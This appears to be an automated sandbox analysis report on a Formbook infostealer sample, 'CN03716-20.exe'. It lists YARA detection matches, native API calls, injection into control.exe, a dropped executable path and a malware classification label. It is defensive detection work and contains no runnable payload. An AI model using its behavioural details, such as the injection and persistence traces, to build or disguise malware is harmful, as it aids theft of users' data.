            Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00419CA0 NtCreateFile,7_2_00419CA0
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00419D50 NtReadFile,7_2_00419D50
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00419DD0 NtClose,7_2_00419DD0
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00419E80 NtAllocateVirtualMemory,7_2_00419E80
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00419C5A NtCreateFile,7_2_00419C5A
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00419CF2 NtCreateFile,7_2_00419CF2
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00419C9A NtCreateFile,7_2_00419C9A
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00419E7A NtAllocateVirtualMemory,7_2_00419E7A
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9840 NtDelayExecution,LdrInitializeThunk,16_2_044B9840
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_044B9860
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9540 NtReadFile,LdrInitializeThunk,16_2_044B9540
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9560 NtWriteFile,LdrInitializeThunk,16_2_044B9560
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_044B9910
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B95D0 NtClose,LdrInitializeThunk,16_2_044B95D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B99A0 NtCreateSection,LdrInitializeThunk,16_2_044B99A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9A50 NtCreateFile,LdrInitializeThunk,16_2_044B9A50
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9650 NtQueryValueKey,LdrInitializeThunk,16_2_044B9650
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_044B9660
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9610 NtEnumerateValueKey,LdrInitializeThunk,16_2_044B9610
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B96D0 NtCreateKey,LdrInitializeThunk,16_2_044B96D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_044B96E0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9770 NtSetInformationFile,LdrInitializeThunk,16_2_044B9770
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9B00 NtSetValueKey,LdrInitializeThunk,16_2_044B9B00
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9710 NtQueryInformationToken,LdrInitializeThunk,16_2_044B9710
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9FE0 NtCreateMutant,LdrInitializeThunk,16_2_044B9FE0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9780 NtMapViewOfSection,LdrInitializeThunk,16_2_044B9780
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044BB040 NtSuspendThread,16_2_044BB040
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9820 NtEnumerateKey,16_2_044B9820
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B98F0 NtReadVirtualMemory,16_2_044B98F0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B98A0 NtWriteVirtualMemory,16_2_044B98A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9950 NtQueueApcThread,16_2_044B9950
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9520 NtWaitForSingleObject,16_2_044B9520
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044BAD30 NtSetContextThread,16_2_044BAD30
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B99D0 NtCreateProcessEx,16_2_044B99D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B95F0 NtQueryInformationFile,16_2_044B95F0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9670 NtQueryInformationProcess,16_2_044B9670
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9A00 NtProtectVirtualMemory,16_2_044B9A00
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9A10 NtQuerySection,16_2_044B9A10
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9A20 NtResumeThread,16_2_044B9A20
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9A80 NtOpenDirectoryObject,16_2_044B9A80
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9760 NtOpenProcess,16_2_044B9760
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044BA770 NtOpenThread,16_2_044BA770
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044BA710 NtOpenProcessToken,16_2_044BA710
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B9730 NtQueryVirtualMemory,16_2_044B9730
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044B97A0 NtUnmapViewOfSection,16_2_044B97A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044BA3B0 NtGetContextThread,16_2_044BA3B0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004E9CA0 NtCreateFile,16_2_004E9CA0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004E9D50 NtReadFile,16_2_004E9D50
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004E9DD0 NtClose,16_2_004E9DD0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004E9E80 NtAllocateVirtualMemory,16_2_004E9E80
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004E9C5A NtCreateFile,16_2_004E9C5A
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004E9CF2 NtCreateFile,16_2_004E9CF2
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004E9C9A NtCreateFile,16_2_004E9C9A
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004E9E7A NtAllocateVirtualMemory,16_2_004E9E7A
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 0_2_014794A80_2_014794A8
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 0_2_0147DB4C0_2_0147DB4C
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 0_2_0147C3A00_2_0147C3A0
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 0_2_0147E2110_2_0147E211
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 0_2_0147A7580_2_0147A758
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_004010307_2_00401030
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_0041D3637_2_0041D363
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00402D877_2_00402D87
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00402D907_2_00402D90
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00409E1B7_2_00409E1B
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00409E207_2_00409E20
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_0041DED57_2_0041DED5
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_0041CEE67_2_0041CEE6
            Source: C:\Users\user\Desktop\CN03716-20.exeCode function: 7_2_00402FB07_2_00402FB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_0453D46616_2_0453D466
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_0453100216_2_04531002
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_0448841F16_2_0448841F
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_045428EC16_2_045428EC
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_0448B09016_2_0448B090
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044A20A016_2_044A20A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_045420A816_2_045420A8
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_04541D5516_2_04541D55
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_0447F90016_2_0447F900
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_04542D0716_2_04542D07
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_04470D2016_2_04470D20
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_0449412016_2_04494120
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_045425DD16_2_045425DD
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_0448D5E016_2_0448D5E0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044A258116_2_044A2581
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_04496E3016_2_04496E30
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_04542EF716_2_04542EF7
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_045422AE16_2_045422AE
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_04542B2816_2_04542B28
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_0453DBD216_2_0453DBD2
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_04541FF116_2_04541FF1
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_044AEBB016_2_044AEBB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004ED36416_2_004ED364
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004D2D8716_2_004D2D87
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004D2D9016_2_004D2D90
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004D9E1B16_2_004D9E1B
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004D9E2016_2_004D9E20
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004EDED516_2_004EDED5
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004ECEE616_2_004ECEE6
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004D2FB016_2_004D2FB0
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016E94A826_2_016E94A8
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EDB4C26_2_016EDB4C
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EC14826_2_016EC148
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EE21226_2_016EE212
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EA75826_2_016EA758
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EF9B726_2_016EF9B7
            Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0447B150 appears 35 times
            Source: CN03716-20.exeBinary or memory string: OriginalFilename vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000000.252168488.000000000096F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamet07L.exe. vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.289598664.0000000001199000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298584201.0000000007EA0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298137296.0000000007980000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000003.275250102.0000000001236000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEminem.dll< vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298294757.0000000007B30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameButterFly.dll< vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298013346.00000000078D0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298013346.00000000078D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN03716-20.exe
            Source: CN03716-20.exeBinary or memory string: OriginalFilename vs CN03716-20.exe
            Source: CN03716-20.exe, 00000007.00000002.339108981.0000000000B1F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamet07L.exe. vs CN03716-20.exe
            Source: CN03716-20.exe, 00000007.00000002.340963412.00000000019A5000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs CN03716-20.exe
            Source: CN03716-20.exe, 00000007.00000002.340495405.000000000189F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CN03716-20.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
            Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: CN03716-20.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: QZblaErkmXlkhK.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: srmdufw81bmhwhwh.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: CN03716-20.exe, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: QZblaErkmXlkhK.exe.0.dr, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 0.0.CN03716-20.exe.930000.0.unpack, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 0.2.CN03716-20.exe.930000.0.unpack, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 7.2.CN03716-20.exe.ae0000.1.unpack, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 7.0.CN03716-20.exe.ae0000.0.unpack, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/12@4/2
            Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\Iw6qliziJump to behavior